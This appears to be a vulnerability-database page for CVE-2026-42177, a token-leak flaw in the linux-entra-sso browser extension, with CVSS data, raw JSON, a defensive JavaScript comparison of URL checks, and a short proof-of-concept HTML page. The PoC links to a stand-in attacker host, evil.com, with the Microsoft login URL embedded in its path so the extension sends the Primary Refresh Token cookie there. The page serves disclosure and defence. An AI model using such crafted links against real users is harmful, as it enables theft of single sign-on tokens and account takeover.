Security Vulnerability Report
CVE-2026-42177 CVSS 5.3 MEDIUM

CVE-2026-42177

Published: 2026-05-12 18:17:24
Last Modified: 2026-05-13 16:31:19

Description

linux-entra-sso is a browser plugin for Linux to SSO on Microsoft Entra ID. Prior to 1.8.1, platform/chrome/js/platform-chrome.js:69-88 registers a single declarativeNetRequest rule whose urlFilter is Platform.SSO_URL + "/*", i.e. "https://login.microsoftonline.com/*". Chrome's urlFilter without a | or || anchor is substring-matched against the full request URL. The rule's action is modifyHeaders, which attaches the Entra ID Primary Refresh Token (PRT) cookie. The Firefox adapter in platform/firefox/js/platform-firefox.js:53 performs a belt-and-braces startsWith(Platform.SSO_URL) check before injecting the header; the Chrome adapter does not. When the extension holds broad host permissions through the optional_host_permissions: ["https://*/*"] declared in platform/chrome/manifest.json:34, a main-frame navigation to a URL whose path embeds https://login.microsoftonline.com/ causes Chrome to attach the PRT cookie to the request to the attacker-controlled host. This vulnerability is fixed in 1.8.1.
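The following is an added illustration, not code from the linux-entra-sso project or the advisory. It models the two matching behaviours the description contrasts: an unanchored urlFilter that is satisfied by the SSO URL appearing anywhere in the request URL, and an origin comparison that only accepts requests whose authority actually is the SSO host. The sample URLs, the function names, and the anchored rule shape (a leading "|" anchor plus a requestDomains condition) are assumptions chosen for the example; the page does not state how the 1.8.1 fix was implemented.

```javascript
// Added example; not the project's code. SSO_URL is the value quoted in the advisory.
const SSO_URL = "https://login.microsoftonline.com";

// Model of an unanchored Chrome declarativeNetRequest urlFilter
// "https://login.microsoftonline.com/*": with no leading "|" or "||" the
// literal part may sit anywhere in the URL, so a substring test reproduces
// the over-match described in the advisory.
function unanchoredUrlFilterMatches(url) {
  return url.includes(SSO_URL + "/");
}

// Hardened decision: parse the URL and compare its origin (scheme + host + port)
// with the SSO origin. Text inside the path or query string never matches.
function isSsoOrigin(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch {
    return false; // unparseable input is never the SSO origin
  }
  return parsed.origin === SSO_URL;
}

// Gate for attaching the PRT header: only requests to the SSO origin qualify.
function shouldAttachPrt(url) {
  return isSsoOrigin(url);
}

// One way to express the same constraint in the rule itself (assumed shape,
// not the project's fix): anchor the filter to the start of the URL with "|"
// and restrict the condition to the SSO host via requestDomains.
function buildAnchoredSsoRule(id) {
  return {
    id,
    priority: 1,
    action: { type: "modifyHeaders", requestHeaders: [] }, // header details omitted
    condition: {
      urlFilter: "|" + SSO_URL + "/*",
      requestDomains: ["login.microsoftonline.com"],
      resourceTypes: ["main_frame", "sub_frame", "xmlhttprequest"],
    },
  };
}

// Constructed sample URLs for the comparison.
const LEGIT = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize";
const EMBEDDED_IN_PATH = "https://third-party.example/callback/https://login.microsoftonline.com/";
const EMBEDDED_IN_QUERY = "https://third-party.example/?next=https://login.microsoftonline.com/";
const LOOKALIKE_HOST = "https://login.microsoftonline.com.third-party.example/";

// Returns, per sample, what each check decides so the difference is visible.
function compareChecks() {
  const samples = { LEGIT, EMBEDDED_IN_PATH, EMBEDDED_IN_QUERY, LOOKALIKE_HOST };
  const report = {};
  for (const [name, url] of Object.entries(samples)) {
    report[name] = {
      substringFilter: unanchoredUrlFilterMatches(url),
      originCheck: shouldAttachPrt(url),
    };
  }
  return report;
}

console.table(compareChecks());
```

Running the block prints a table in which the substring model accepts both the legitimate authorize URL and the two URLs that merely embed the SSO URL, while the origin check accepts only the legitimate one and also rejects the look-alike host.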

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

linux-entra-sso < 1.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC Concept: Attacker sets up a page to trigger the leak -->
<!-- This is a simulation of the attack vector -->
<script>
  // The attacker crafts a URL where the path contains the target string
  const maliciousUrl = "https://evil.com/redirect_to/https://login.microsoftonline.com/";
  // When the victim navigates to this URL (e.g., via a link),
  // the vulnerable extension detects the substring match.
  // The extension then appends the PRT cookie to the request sent to evil.com.
  console.log("Simulating navigation to: " + maliciousUrl);
  // In a real scenario, window.location.href = maliciousUrl;
</script>
<!-- HTML Body -->
<h1>CVE-2026-42177 PoC Simulation</h1>
<p>Click <a href="https://evil.com/xyz/https://login.microsoftonline.com/">here</a> to trigger PRT leak if vulnerable extension is installed.</p>

References

https://github.com/siemens/linux-entra-sso/security/advisories/GHSA-52rj-42vh-2rxc

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42177", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:24.240", "lastModified": "2026-05-13T16:31:18.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "linux-entra-sso is a browser plugin for Linux to SSO on Microsoft Entra ID. Prior to 1.8.1, platform/chrome/js/platform-chrome.js:69-88 registers a single declarativeNetRequest rule whose urlFilter is Platform.SSO_URL + \"/*\", i.e. \"https://login.microsoftonline.com/*\". Chrome's urlFilter without a | or || anchor is substring-matched against the full request URL. The same applied rule action is modifyHeaders that attaches the Entra ID Primary Refresh Token cookie. The Firefox adapter in platform/firefox/js/platform-firefox.js:53 performs a belt-and-braces startsWith(Platform.SSO_URL) check before injecting the header; the Chrome adapter does not. When the extension holds broad host permissions through the optional_host_permissions: [\"https://*/*\"] declared in platform/chrome/manifest.json:34, a main-frame navigation to a URL whose path embeds https://login.microsoftonline.com/ causes Chrome to attach the PRT cookie to the request to the attacker-controlled host. This vulnerability is fixed in 1.8.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-436"}]}], "references": [{"url": "https://github.com/siemens/linux-entra-sso/security/advisories/GHSA-52rj-42vh-2rxc", "source": "[email protected]"}, {"url": "https://github.com/siemens/linux-entra-sso/security/advisories/GHSA-52rj-42vh-2rxc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}